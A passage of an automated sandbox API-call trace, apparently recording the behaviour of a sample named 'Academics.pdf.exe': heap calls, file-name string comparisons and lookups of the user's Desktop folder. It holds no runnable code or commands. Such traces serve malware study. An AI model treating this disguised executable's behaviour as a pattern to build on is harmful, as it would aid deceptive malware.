lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.559] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Academics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cademics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ademics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="demics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="emics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ics.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cs.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0161.562] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0161.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0161.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Academics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cademics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ademics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="demics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="emics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ics.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cs.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b39d0 [0161.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0161.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0161.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.566] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0161.566] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0161.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0161.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0161.567] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0161.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.567] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0161.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0161.570] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.570] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0161.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0161.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0161.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0161.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0161.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0161.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0161.574] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.574] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 